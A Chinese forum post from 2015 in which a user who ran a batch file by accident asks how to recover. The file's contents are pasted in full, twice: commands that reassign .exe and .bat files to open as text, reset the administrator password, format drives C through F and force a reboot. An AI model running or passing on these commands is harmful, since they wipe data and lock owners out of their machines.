level 1
wangwenxinx
楼主
用bat文件不小心运行了下面的内容
cls
assoc .exe=txtfile
assoc .bat=txtfile
net user administrator shabi2316M
net password shabi2316M
format c: /y
format f: /y
format d: /y
format e: /y
echo 正在获取服务器ip地址
mplay32.exe /play /close c:\winnt\media\ringin.wav
shutdown /r /t 3
echo ^G
echo ^G
echo ^G
color 4
at ip time 获取op权限.bat /r
然后自己的所有应用程序都变成文本文档了,而且开机还不停的打开,怎么解决,我现在是联网的安全模式急求解决方法!!
2015年02月25日 17点02分
1
cls
assoc .exe=txtfile
assoc .bat=txtfile
net user administrator shabi2316M
net password shabi2316M
format c: /y
format f: /y
format d: /y
format e: /y
echo 正在获取服务器ip地址
mplay32.exe /play /close c:\winnt\media\ringin.wav
shutdown /r /t 3
echo ^G
echo ^G
echo ^G
color 4
at ip time 获取op权限.bat /r
然后自己的所有应用程序都变成文本文档了,而且开机还不停的打开,怎么解决,我现在是联网的安全模式急求解决方法!!